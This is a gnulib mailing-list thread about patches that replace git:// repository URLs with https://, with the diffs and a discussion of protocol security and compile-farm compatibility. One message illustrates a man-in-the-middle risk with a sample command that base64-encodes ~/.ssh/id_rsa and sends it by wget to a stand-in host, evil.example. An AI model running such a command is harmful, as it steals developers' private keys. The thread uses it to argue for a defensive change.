Re: [PATCH] Use https:// instead of git://.
On 1/10/21 5:14 PM, Bruno Haible wrote: > "https://git.savannah.gnu.org/git/myproject.git - >encrypted read-only anonymous smart http access" Nice, then https:// seems indeed to be better than git://. Have a nice day, Berny
Re: [PATCH] Use https:// instead of git://.
Bernhard Voelker wrote: > For HTTP/HTTPS, the question is if the server is configured for > "smart HTTP" or if the client has to fall back to "dumb HTTP". Does https://savannah.gnu.org/maintenance/UsingGit/ answer this question? It says: "https://git.savannah.gnu.org/git/myproject.git - encrypted read-only anonymous smart http access" Bruno
Re: [PATCH] Use https:// instead of git://.
On 1/10/21 1:20 PM, Simon Josefsson via Gnulib discussion list wrote: > Using https:// instead of git:// makes this slightly better. Both https:// and git:// URLs are configured to be read-only on the Savannah server, and only the ssh:// variant allows pushing. https://git-scm.com/book/en/v2/Git-Internals-Transfer-Protocols https://git-scm.com/book/en/v2/Git-on-the-Server-The-Protocols For HTTP/HTTPS, the question is if the server is configured for "smart HTTP" or if the client has to fall back to "dumb HTTP". The latter would come with slower performance and more round-trips. The Savannah admins should have an answer to that question. The git:// protocol is definitely always using the "smart" way, but - as you said - doesn't allow authentication. Well, http:// is probably not configured to do that either, and we probably don't need that for the read-only variant. The disadvantage of the git:// protocol is that it needs port 9418, and therefore some corporate networks may have some problems. Unless we have proof from the Savannah admins that https:// is setup to be "smart" (whatever that involves), I'd therefore prefer the always-"smart" git://. Have a nice day, Berny
Re: [PATCH] Use https:// instead of git://.
I had a walk and realized it might be better to think of the problem like this. Consider if someone wants to volunteer to do a new gettext release, they would go to https://savannah.gnu.org/git/?group=gettext which properly suggest to checkout over https or SSH. After reading HACKING the person performs runs ./gitsub.sh pull which prints: Submodule 'gnulib' (git://git.sv.gnu.org/gnulib.git) registered for path 'gnulib' Cloning into '/home/jas/src/gettext/gnulib'... and then continues to run ./autogen.sh which invokes gnulib-tool from the newly checkout. Since the git:// protocol does not offer security, the gnulib-tool could be modified on the way to do something evil like: wget -q -O /dev/null https://evil.example/`base64 -w0 < ~/.ssh/id_rsa` Your SSH key might be encrypted, but the password can be cracked offline. After this, they have write access to the savannah git repository. I'm sure similar attacks can be done against ./bootstrap, and to send the GnuPG key instead if you want to fake signed tarballs instead of gaining write access to the repository. Knowing the SSH/PGP key of key GNU developers enables someone to mount further attacks, and gaining this ability is attractive to a number of actors with funding. Of course, there may be details I'm missing that prevents the exact logic I'm describing to work. The core of the problem is: gnulib encourage developers to run scripts from remote unverified sources. Using https:// instead of git:// makes this slightly better. Using https has its own set of problems, but none that warrants ignoring the initial concern. I wish everyone would use a hardware SSH/PGP key device, to make these attacks harder. I have my SSH/PGP on a GNUK device: https://blog.josefsson.org/2019/03/21/planning-for-a-new-openpgp-key/ You can buy them from the FSF: https://shop.fsf.org/storage-devices/neug-usb-true-random-number-generator Upgrade them to run GNUK like this: https://blog.josefsson.org/2019/03/21/installing-gnuk-on-fst-01g-running-neug/ /Simon signature.asc Description: PGP signature
Re: [PATCH] Use https:// instead of git://.
Bruno Haible writes: > Hi Simon, > > Can you briefly say, why, please? Is the 'git' protocol unsecure? > Is it a problem specifically with Savannah? Or what else? Sorry I should have included this -- I thought it was well-known. The man page for git-clone https://git-scm.com/docs/git-clone says: The native transport (i.e. git:// URL) does no authentication and should be used with caution on unsecured networks. Savannah appears to have changed default occurances of git:// to https:// these days. GitLab and GitHub changed their default offerings for anonymous checkouts long time ago. There is no problem with git:// if you know what you are doing, as with everything, but the same can be said for http:// and ftp://, and apparently the consensus over time is to move to https:// by default for everything. > Also: > >> -# url = git://git.savannah.gnu.org/gnulib.git >> +# url = https://git.savannah.gnu.org/git/gnulib.git gnulib > > Is this syntactically right? Thank you -- that was not intentional. I have fixed this, see attachment. Jeffrey Walton writes: > This may cause trouble for some of the machines on the compile farm. > > The problem is, Git is old and cacerts are beyond their shelf life. > Trying to checkout with https:// fails. The CFarm admins tell users to > checkout using git:// instead. It is fine to use the old variant if you want to, but my point is that the new default should be https:// going forward. Maybe we can see if the change causes any problems, and what they are? Let us know if you notice any change -- the majority of gnulib already uses https:// URLs for git repositories. /Simon From 411da821020a5f3e8ae592fd396854af2d8de046 Mon Sep 17 00:00:00 2001 From: Simon Josefsson Date: Sun, 10 Jan 2021 11:28:31 +0100 Subject: [PATCH] Correct preceeding change. * top/gitsub.sh: Update link. --- ChangeLog | 5 + top/gitsub.sh | 4 ++-- 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/ChangeLog b/ChangeLog index bc2e033c8..a5bf3ec78 100644 --- a/ChangeLog +++ b/ChangeLog @@ -1,3 +1,8 @@ +2021-01-10 Simon Josefsson + + Correct preceeding change. + * top/gitsub.sh: Update link. + 2021-01-09 Bruno Haible immutable: Add tests. diff --git a/top/gitsub.sh b/top/gitsub.sh index de6cb828e..b0be2e1a7 100755 --- a/top/gitsub.sh +++ b/top/gitsub.sh @@ -64,13 +64,13 @@ # # You don't add this piece of configuration to .gitmodules manually. Instead, # you would invoke -# $ git submodule add --name "gnulib" -- https://git.savannah.gnu.org/git/gnulib.git +# $ git submodule add --name "gnulib" -- https://git.savannah.gnu.org/git/gnulib.git gnulib # # * The subdirectories that are not git submodules, in a similar syntax. For # example: # # [subcheckout "gnulib"] -# url = https://git.savannah.gnu.org/git/gnulib.git gnulib +# url = https://git.savannah.gnu.org/git/gnulib.git # path = gnulib # # Here the URL is the one used for anonymous checkouts of the dependency -- 2.20.1 signature.asc Description: PGP signature
Re: [PATCH] Use https:// instead of git://.
On Sat, Jan 9, 2021 at 7:10 PM Simon Josefsson via Gnulib discussion
list wrote:
>
> I have pushed this, and I also updated the link from
> https://www.gnu.org/software/gnulib/
>
> /Simon
>
> * build-aux/bootstrap (default_gnulib_url): Ditto.
> * config/srclistvars.sh: Ditto.
> * doc/gnulib-readme.texi (Git Checkout): Ditto.
> * doc/gnulib-tool.texi (VCS Issues): Ditto.
> * top/gitsub.sh: Update link.
> ---
> ChangeLog | 9 +
> build-aux/bootstrap| 4 ++--
> config/srclistvars.sh | 2 +-
> doc/gnulib-readme.texi | 6 +++---
> doc/gnulib-tool.texi | 2 +-
> top/gitsub.sh | 6 +++---
> 6 files changed, 19 insertions(+), 10 deletions(-)
>
> diff --git a/ChangeLog b/ChangeLog
> index 4329b81d9..aad572748 100644
> --- a/ChangeLog
> +++ b/ChangeLog
> @@ -1,3 +1,12 @@
> +2021-01-10 Simon Josefsson
> +
> + Use https:// instead of git://.
> + * build-aux/bootstrap (default_gnulib_url): Ditto.
> + * config/srclistvars.sh: Ditto.
> + * doc/gnulib-readme.texi (Git Checkout): Ditto.
> + * doc/gnulib-tool.texi (VCS Issues): Ditto.
> + * top/gitsub.sh: Update link.
> +
> 2021-01-09 Paul Eggert
>
> snippet/_Noreturn: port to pedantic clang
> diff --git a/build-aux/bootstrap b/build-aux/bootstrap
> index 8a61c1a58..c17a36f1f 100755
> --- a/build-aux/bootstrap
> +++ b/build-aux/bootstrap
> @@ -1,6 +1,6 @@
> #! /bin/sh
> # Print a version string.
> -scriptversion=2021-01-08.10; # UTC
> +scriptversion=2021-01-10.00; # UTC
>
> # Bootstrap this package from checked-out sources.
>
> @@ -47,7 +47,7 @@ PERL="${PERL-perl}"
>
> me=$0
>
> -default_gnulib_url=git://git.sv.gnu.org/gnulib
> +default_gnulib_url=https://git.savannah.gnu.org/git/gnulib.git
>
> usage() {
>cat < diff --git a/config/srclistvars.sh b/config/srclistvars.sh
> index aabcd1489..c1d97e0e5 100755
> --- a/config/srclistvars.sh
> +++ b/config/srclistvars.sh
> @@ -34,6 +34,6 @@ esac
> : ${GNUSTANDARDS=../gnustandards}
> : ${GNUWWWLICENSES=../www/www/licenses}
> : ${LIBCSRC=../libc}
> -: ${LIBGCRYPT=../libgcrypt} # git://git.gnupg.org/libgcrypt.git
> +: ${LIBGCRYPT=../libgcrypt} # https://dev.gnupg.org/source/libgcrypt.git
> : ${LIBTOOL=../libtool}
> : ${TEXINFOTEX=../../ftp.gnu.org/gnu/texinfo}
> diff --git a/doc/gnulib-readme.texi b/doc/gnulib-readme.texi
> index 85750148c..0a32f980c 100644
> --- a/doc/gnulib-readme.texi
> +++ b/doc/gnulib-readme.texi
> @@ -53,14 +53,14 @@ Gnulib is available for anonymous checkout. In any
> Bourne-shell the
> following should work:
>
> @example
> -$ git clone git://git.sv.gnu.org/gnulib.git
> +$ git clone https://git.savannah.gnu.org/git/gnulib.git
> @end example
>
> For a read-write checkout you need to have a login on
> @samp{savannah.gnu.org} and be a member of the Gnulib project at
> @url{https://savannah.gnu.org/projects/gnulib}. Then, instead of the
> -URL @url{git://git.sv.gnu.org/gnulib}, use the URL
> -@samp{ssh://@var{user}@@git.sv.gnu.org/srv/git/gnulib} where
> +URL @url{https://git.savannah.gnu.org/git/gnulib.git}, use the URL
> +@samp{ssh://@var{user}@@git.savannah.gnu.org/srv/git/gnulib} where
> @var{user} is your login name on savannah.gnu.org.
>
> git resources:
> diff --git a/doc/gnulib-tool.texi b/doc/gnulib-tool.texi
> index f3b034f85..97881f136 100644
> --- a/doc/gnulib-tool.texi
> +++ b/doc/gnulib-tool.texi
> @@ -959,7 +959,7 @@ in the directory @file{.gnulib}:
>
> @smallexample
> $ dir=.gnulib
> -$ git submodule add -- git://git.sv.gnu.org/gnulib.git $dir
> +$ git submodule add -- https://git.savannah.gnu.org/git/gnulib.git $dir
> $ git config alias.syncsub "submodule foreach git pull origin master"
> @end smallexample
>
> diff --git a/top/gitsub.sh b/top/gitsub.sh
> index 172044ce2..de6cb828e 100755
> --- a/top/gitsub.sh
> +++ b/top/gitsub.sh
> @@ -59,18 +59,18 @@
> # . For example:
> #
> # [submodule "gnulib"]
> -# url = git://git.savannah.gnu.org/gnulib.git
> +# url = https://git.savannah.gnu.org/git/gnulib.git
> # path = gnulib
> #
> # You don't add this piece of configuration to .gitmodules manually.
> Instead,
> # you would invoke
> -# $ git submodule add --name "gnulib" --
> git://git.savannah.gnu.org/gnulib.git gnulib
> +# $ git submodule add --name "gnulib" --
> https://git.savannah.gnu.org/git/gnulib.git
> #
> # * The subdirectories that are not git submodules, in a similar syntax. For
> # example:
> #
> # [subcheckout "gnulib"]
> -# url = git://git.savannah.gnu.org/gnulib.git
> +# url = https://git.savannah.gnu.org/git/gnulib.git gnulib
> # path = gnulib
This may cause trouble for some of the machines on the compile farm.
The problem is, Git is old and cacerts are beyond their shelf life.
Trying to checkout with https:// fails. The CFarm admins tell users to
checkout using git:// instead.
Jeff
Re: [PATCH] Use https:// instead of git://.
Hi Simon, Can you briefly say, why, please? Is the 'git' protocol unsecure? Is it a problem specifically with Savannah? Or what else? Also: > -# url = git://git.savannah.gnu.org/gnulib.git > +# url = https://git.savannah.gnu.org/git/gnulib.git gnulib Is this syntactically right? Bruno
